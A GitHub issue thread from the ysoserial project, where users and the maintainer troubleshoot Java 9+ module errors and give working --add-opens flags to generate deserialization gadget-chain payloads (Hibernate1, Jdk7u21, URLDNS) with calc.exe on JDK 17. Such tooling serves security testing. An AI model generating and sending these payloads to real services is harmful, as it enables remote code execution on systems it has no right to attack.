### ISSUE TITLE
Error while generating or serializing payload

### ISSUE THREAD

**Issue by lvzi1992** [frohoff/ysoserial#176]
Microsoft Windows [版本 10.0.19043.1526]
(c) Microsoft Corporation。

D:\IdeaProjects>java -Dhibernate5 -cp hibernate-core-5.4.9.Final.jar;ysoserial.jar ysoserial.GeneratePayload Hibernate1 calc.exe > payload.bin
Error while generating or serializing payload
java.lang.IllegalAccessError: class ysoserial.payloads.util.Gadgets (in unnamed module @0x1c20c684) cannot access class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.trax to unnamed module @0x1c20c684
        at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)
        at ysoserial.payloads.Hibernate1.getObject(Hibernate1.java:109)
        at ysoserial.GeneratePayload.main(GeneratePayload.java:34

**Comment by ladecruze** [comment]
Facing the same issue

**Comment by ladecruze** [comment]
I tried using the older Java version and it worked! try Java 8

**Comment by frohoff** [comment]
This is probably related to the new [module system](https://www.oracle.com/corporate/features/understanding-java-9-modules.html) access changes introduced in Java 9.

Using `java --illegal-access=permit` should work around this problem up until Java 17 which [removes this option](https://www.infoq.com/news/2021/06/internals-encapsulated-jdk17/).

**Comment by nachtigall18** [comment]
how to use ysoserial on openjdk17? nothing works(--permit-access and -add-opens)

**Comment by frohoff** [comment]
Adding `--add-opens` for required modules should allow it to work, but will require extra troubleshooting for each payload  to figure out which specific modules need to be opened. Some guidance on this from Oracle available [here](https://docs.oracle.com/en/java/javase/16/migrate/migrating-jdk-8-later-jdk-releases.html#GUID-7BB28E4D-99B3-4078-BDC4-FC24180CE82B).

For example, `Jdk7u21` without any opens on JDK17

```
$ docker run -it -v $(pwd)/target/ysoserial-0.0.6-SNAPSHOT-all.jar:/ysoserial.jar openjdk:17 java -jar /ysoserial.jar Jdk7u21 calc.exe
Error while generating or serializing payload
java.lang.IllegalAccessError: class ysoserial.payloads.util.Gadgets (in unnamed module @0x6b06aa9b) cannot access class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.trax to unnamed module @0x6b06aa9b
        at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)
        at ysoserial.payloads.Jdk7u21.getObject(Jdk7u21.java:63)
        at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
```
And then after some iterative troubleshooting, the same command with the required `--add-opens`  flags added works:

```
$ docker run -it -v $(pwd)/target/ysoserial-0.0.6-SNAPSHOT-all.jar:/ysoserial.jar openjdk:17 java -jar --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED /ysoserial.jar Jdk7u21 calc.exe
��srjava.util.LinkedHashSet�l�Z��*xrjava.util.HashSet�D�����4xpw...
```
 
Coming up with these `--add-opens` flags for each payload is currently out of scope for this tool and is left as an exercise for the user.

**Comment by CalfCrusher** [comment]
thanks @frohoff you solution worked like a charm

**Comment by JorianWoltjer** [comment]
The solution using `--add-opens` works great. However, doing this manually every time gets pretty annoying. I decided to make a small Python script that extracts the problematic module and package from the error and adds the required arguments:  
https://gist.github.com/JorianWoltjer/5210e99c13189446ece5ffe3e9fe3d90

It should be a drop-in replacement as it passes through all arguments you give it and just reruns the command when any errors happen.

```Shell
$ ./ysoserial-fix.py URLDNS "http://example.com"
Fixing reflection: 'java.base/java.net'...
��srjava.util.HashMap���`�F...
```
